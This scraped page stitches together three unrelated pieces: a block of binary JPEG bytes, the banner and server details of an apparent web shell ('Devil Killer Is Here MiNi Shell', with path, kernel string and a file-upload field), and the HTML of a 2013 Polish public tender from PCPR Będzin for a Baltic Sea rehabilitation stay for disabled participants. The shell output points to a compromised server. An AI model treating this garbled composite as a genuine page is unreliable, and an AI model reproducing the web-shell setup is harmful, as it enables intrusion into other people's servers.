JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130709/266912-N-2013.html

<p class="kh_header"><b>Będzin: Przeprowadzenie i zorganizowanie turnusu rehabilitacyjnego nad Morzem Bałtyckim wraz z indywidualnymi i grupowymi zajęciami z doradcą zawodowym oraz wsparciem psychologicznym dla uczestników projektu systemowego pn.: Inwestycja w człowieka środkiem do osiągnięcia efektów społecznych, współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2</b><br>
<b>Numer ogłoszenia: 266912 - 2013; data zamieszczenia: 09.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Będzinie , ul. Krasickiego 17, 42-500 Będzin, woj. śląskie, tel. 32 267 81 08, faks 32 267 81 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie i zorganizowanie turnusu rehabilitacyjnego nad Morzem Bałtyckim wraz z indywidualnymi i grupowymi zajęciami z doradcą zawodowym oraz wsparciem psychologicznym dla uczestników projektu systemowego pn.: Inwestycja w człowieka środkiem do osiągnięcia efektów społecznych, współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa rehabilitacyjna polegająca na  przeprowadzeniu i zorganizowaniu turnusu rehabilitacyjnego nad Morzem Bałtyckim wraz z indywidualnymi i grupowymi zajęciami z doradcą zawodowym oraz wsparciem psychologicznym dla uczestników projektu systemowego pn.: Inwestycja w człowieka środkiem do osiągnięcia efektów społecznych, współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2  

Uczestnikami turnusu będzie 50 osób w tym:
 - 39 osób niepełnosprawnych, 
- 3 opiekunów osób ze znacznym stopniem niepełnosprawności
- 3 dzieci do lat 7,  
- 3 osoby zależne (niepełnosprawne dzieci w wieku 7-13 lat) a także 
- 2 pracowników z PCPR monitorujących przebieg turnusu, pobyt tylko w pierwszym tygodniu trwania turnusu.

Osoby monitorujące przebieg turnusu z Powiatowego Centrum Pomocy Rodzinie w Będzinie będą przeprowadzały wizytę monitorującą w pierwszym tygodniu trwania turnusu. 


a)  Odbiorcami będą osoby niepełnosprawne w stopniu znacznym, umiarkowanym i lekkim, zakłada się również pobyt 3 opiekunów dla osób z orzeczonym znacznym stopniem niepełnosprawności oraz 3 dzieci  do lat 7 a także 3 osoby zależne (niepełnosprawne dzieci w wieku 7-13 lat), a także 2 pracowników z PCPR monitorujących przebieg turnusu (pobyt tylko w pierwszym tygodniu trwania turnusu, od 15.09. wyjazd autokarem z Będzina, pobyt w ośrodku do 20.09.2013r.,  przyjazd do Będzina we własnym zakresie).

Zamawiający zastrzega, że podana liczba osób uczestnicząca w turnusie jest liczbą maksymalną. 
Ze względu na specyficzną grupę odbiorców dopuszcza się możliwość zmniejszenia liczby osób biorących udział  turnusie rehabilitacyjnym.


2. Wymagania dotyczące ośrodka oraz kadry, w którym zorganizowany zostanie turnus dla uczestników 

a)Turnus ma się odbywać na terenie Rzeczypospolitej Polskiej nad Morzem Bałtyckim, w jednym z ośrodków rehabilitacyjno - wypoczynkowych, posiadających aktualny wpis do rejestru ośrodków uprawnionych do przyjmowania osób niepełnosprawnych (zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusu rehabilitacyjnego Dz. U.2007.230.1694). Odległość ośrodka, o którym mowa, 
od morza nie może przekroczyć 700 metrów. Taksa klimatyczna za wszystkich uczestników wliczona w cenę oferty.

b)Ośrodek rehabilitacyjno - wypoczynkowy ma być zlokalizowany w miejscowości atrakcyjnej turystycznie i  musi posiadać wpis do rejestru ośrodków prowadzonego przez właściwego wojewodę na podstawie rozporządzenia Ministra Pracy i Polityki społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007r. (Dz.U.2007.230.1694), w którym mogą odbywać się turnusy rehabilitacyjne dla zorganizowanych grup osób niepełnosprawnych: - z chorobami układu moczowo-płciowego, z chorobami neurologicznymi,  z chorobami psychicznymi, z upośledzeniem umysłowym, z dysfunkcją narządu wzroku, z dysfunkcją narządu słuchu, z chorobami układu oddechowo - krążeniowymi, chorobami metabolicznymi, endokrynologicznymi, z dysfunkcją narządu ruchu (z wyłączeniem osób poruszających się na wózkach inwalidzkich), z epilepsją, 
z chorobami układu pokarmowo - trawiennego, z cukrzycą, po mastektomii.

c) Turnus ma trwać 14 dni. Dojazd ma być zorganizowany w dni  poprzedzające i następujące po turnusie. Wykonawca zapewnia transport uczestników z Będzina do miejsca realizacji zamówienia i z powrotem. 
d) Przez transport, o którym mowa powyżej, rozumie się transport autokarowy. Autokar winien być technicznie sprawny,  powinien posiadać klimatyzację oraz toaletę. Przewoźnik powinien posiadać wszelkie zezwolenia i licencje. W przypadku awarii autokaru Wykonawca zobowiązany jest zapewnić zastępczy środek transportu spełniający warunki, o których mowa wyżej. Wykonawca zapewnia 
2 kierowców do jazdy autokarem na zmianę.

e) Wykonawca zobowiązany jest ubezpieczyć wszystkich uczestników turnusu oraz opiekunów i dzieci od następstw nieszczęśliwych wypadków. Okres ubezpieczenia obejmuje cały okres trwania realizacji zamówienia.  Wykonawca dokona ubezpieczenia na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej dzień przed realizacją zamówienia.

f) Uczestnicy turnusu muszą być zakwaterowani w jednym ośrodku (w jednym budynku), 
w pokojach 2, 3 osobowych z pełnym węzłem sanitarnym. Stołówka oraz sale wykładowe muszą znajdować się w tym samym budynku co zakwaterowanie. Wykonawca zapewnia uczestnikom turnusu wyżywienie  w postaci trzech posiłków dziennie z deserem. Wykonawca zapewnia prowiant na drogę powrotną, a także prowiant na planowane wycieczki.

g) Każda z osób niepełnosprawnych ma mieć zapewnione minimum 2 zabiegi dziennie według wskazań lekarskich. Wykonawca zobowiązany będzie do prowadzenia imiennych list potwierdzających wykonanie zabiegów rehabilitacyjnych. Zabiegi rehabilitacyjne mają być przeprowadzane w tym samym budynku co zakwaterowanie uczestników.

h) Wykonawca zobowiązuje się do zapewnienia uczestnikom i uczestniczkom turnusu całodobowej opieki pielęgniarskiej oraz doraźnej opieki lekarskiej. 

i) Wykonawca zobowiązuje się do zapewnienia odpowiedniej kadry w ośrodku gwarantującej prawidłową realizację programu turnusu w tym kierownika grupy odpowiedzialnego za koordynację pobytu grupy uczestników w zakresie obsługi całości zamówienia oraz animatora dla osób uczestniczących w turnusie, którego zadaniem będzie organizowanie czasu wolnego uczestnikom turnusu .

j) Wykonawca zobowiązuje się do zapewnienia opieki dla 3 dzieci do lat 7 oraz 3 dzieci niepełnosprawnych uznanych jako osoby zależne w czasie, kiedy ich rodzice - opiekunowie, będą uczestniczyć we wszelkich przewidzianych programem turnusu zajęciach. 

k) Wykonawca zapewni w trakcie realizacji turnusu dodatkowe atrakcje w postaci: wycieczek wyjazdowych (co najmniej 2 wycieczki jednodniowe), w trakcie których zapewni bilety wstępu dla wszystkich uczestników na zwiedzanie atrakcji turystycznych podczas wycieczek wraz z wyżywieniem (ciepły posiłek)   w czasie jej trwania,  ognisk, wieczorków integracyjnych i innych. 


3. Wymagania dotyczące przeprowadzenia indywidualnych oraz grupowych zajęć z doradcą zawodowym oraz wsparciem psychologicznym dla uczestników turnusu

Uczestnikami indywidualnych i grupowych zajęć z doradcą zawodowym przeprowadzanych w trakcie trwania 14-dniowego turnusu rehabilitacyjnego będzie 39 osób niepełnosprawnych, natomiast wsparciem psychologicznym objętych będzie 27 kobiet  niepełnosprawnych, będących beneficjentami projektu pn: Inwestycja w człowieka środkiem do osiągnięcia efektów społecznych.
Wykonawca zapewnia sale wykładowe i ćwiczeniowe w budynku, w którym zakwaterowani zostaną uczestnicy turnusu w celu przeprowadzenia indywidualnych oraz grupowych zajęć z doradcą zawodowym oraz wsparciem psychologicznym. 

a) Wykonawca zobowiązuje się do przeprowadzenia warsztatów z doradztwa zawodowego w ilości 7 godzin dla każdej grupy przy czym grupa osób uczestniczących w zajęciach nie może przekroczyć 10 osób. 

b) Wykonawca zobowiązuje się do przeprowadzenia indywidualnych zajęć z doradcą zawodowym w ilości 2 godziny dla każdego niepełnosprawnego uczestnika/uczestniczki projektu.

c) Wykonawca zobowiązuje się do przeprowadzenia indywidualnych dla każdej niepełnosprawnej uczestniczki turnusu zajęć z psychologiem w ilości 3 godziny.

d) Wykonawca zapewnia odpowiednią kadrę do prowadzenia warsztatów z doradztwa zawodowego oraz wsparcia psychologicznego - co najmniej 3 osoby prowadzące warsztaty: 
1 psychologa i 2 doradców zawodowych - posiadających właściwe kwalifikacje potwierdzone zaświadczeniami/certyfikatami/świadectwami (psycholog - studia psychologiczne, doradca zawodowy - studia wyższe z doradztwa zawodowego, bądź studia podyplomowe w zakresie doradztwa zawodowego lub posiadanie licencji doradcy zawodowego), posiadającą co najmniej 
2 letnie doświadczenie zawodowe w prowadzeniu warsztatów, będących przedmiotem zamówienia. Wykonawca przedstawia Zamawiającemu dokumenty świadczące o odpowiednich kwalifikacjach prowadzących zajęcia na wezwanie Zamawiającego.  

e) Wykonawca zobowiązany jest do prowadzenia dokumentacji warsztatu z doradztwa zawodowego i wsparcia psychologicznego tj. listy obecności uczestników, informacji o przebiegu warsztatu, rozmów, dziennika zajęć edukacyjnych, zaświadczeń  o ukończeniu zajęć  oraz dokumentacji fotograficznej na CD. Wykonawca przekaże Zamawiającemu dokumentację 
w terminie 7 dni od zakończenia turnusu.

f) Wykonawca opracowuje i dostarcza do miejsc szkoleń niezbędnych materiałów szkoleniowych opatrzonych w logotypy Unii Europejskiej w formie papierowej
i przekazuje je uczestnikom szkolenia.

g) Oznakowanie pomieszczeń, w których odbywać się będą szkolenia logotypami Unii Europejskiej. 

h) Wykonawca zobowiązany będzie do niezwłocznego poinformowania Zamawiającego o:
- nie zgłoszeniu się uczestników na turnus 
- przerwaniu indywidualnej rehabilitacji, nieobecności uczestnika w zabiegach
- nieobecności osób niepełnosprawnych na zajęciach z psychologiem i doradcą zawodowym
- innych sytuacjach, które mają wpływ na realizację umowy.

 Zamawiający wymaga realizacji zamówienia w miesiącu wrześniu 2013 r. w terminie 15 - 30 września 2013 r. 
15 września w godz. wieczornych wyjazd z Będzina, 30 września przyjazd do Będzina w godzinach porannych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wpis do rejestru organizatorów turnusów rehabilitacyjnych, o którym mowa w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych (Dz.U.2007.230.1694) uprawniających do organizacji turnusów rehabilitacyjnych dla zorganizowanych grup osób niepełnosprawnych: - z chorobami układu moczowo-płciowego, z chorobami neurologicznymi,  z chorobami psychicznymi, z upośledzeniem umysłowym, z dysfunkcją narządu wzroku, z dysfunkcją narządu słuchu, z chorobami układu oddechowo - krążeniowymi, chorobami metabolicznymi, endokrynologicznymi, z dysfunkcją narządu ruchu (z wyłączeniem osób poruszających się na wózkach inwalidzkich), z epilepsją, z chorobami układu pokarmowo - trawiennego, z cukrzycą, po mastektomii.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykazuje, że wykonał w okresie ostatnich trzech lat co najmniej trzy (3) usługi główne, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Za usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia zamawiający uważać będzie usługi polegające na organizacji (trzech) turnusów rehabilitacyjnych dla osób niepełnosprawnych wraz z opiekunami o wartości każdego z trzech turnusów 
co najmniej 60.000,00 PLN brutto (słownie: sześćdziesiąt tysięcy złotych 00/100). Zamawiający uzna warunek za spełniony również wtedy, gdy Wykonawca wskaże należyte wykonanie co najmniej 3 usług bez względu na sposób ich organizacji w ramach jednej czy kilku umów, np. jeżeli w ramach jednej usługi przewidziana jest realizacja 3 turnusów rehabilitacyjnych, przy czy wartość umowy nie może być niższa jak 180 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna złożenie pisemnego oświadczenia przez wykonawcę w tym zakresie art. 22 ust.1 ustawy Prawo zamówień publicznych na druku zgodnym z treścią załącznika nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zapewnia odpowiednią kadrę do prowadzenia warsztatów z doradztwa zawodowego oraz wsparcia psychologicznego - co najmniej 3 osoby prowadzące warsztaty: 
1 psychologa i 2 doradców zawodowych - posiadających właściwe kwalifikacje potwierdzone zaświadczeniami, certyfikatami, świadectwami (psycholog - studia psychologiczne, doradca zawodowy - studia wyższe z doradztwa zawodowego, bądź studia podyplomowe w zakresie doradztwa zawodowego lub posiadanie licencji doradcy zawodowego), posiadającą co najmniej 
2 letnie doświadczenie zawodowe w prowadzeniu warsztatów, będących przedmiotem zamówienia. Wykonawca przedstawia Zamawiającemu dokumenty świadczące o odpowiednich kwalifikacjach prowadzących zajęcia na wezwanie Zamawiającego.  
Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, iż dysponuje co najmniej 3 osobami posiadającymi kwalifikacje  zawodowe (1 psycholog i 2 doradców zawodowych) i  co najmniej 2 letnie doświadczenie w zakresie przeprowadzania warsztatów z doradztwa zawodowego oraz wsparcia psychologicznego zgodnie z załącznikiem  nr 4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca posiada ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej, obejmujące przedmiot zamówienia, na kwotę nie mniejszą niż 150.000,00 PLN.
2.Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i ust. 2 ustawy.
3.Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty.
4. Wykonawca musi wykazać spełnienie każdego z warunków zawartych w Specyfikacji
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty  metodą: spełnia -nie spełnia.
5. Wykonawców, którzy nie wykazali spełniania warunków udziału w postępowaniu wyklucza się z postępowania.
6. Zamawiający zawiadamia równocześnie wykonawców, którzy zostali wykluczeni  z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
7. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
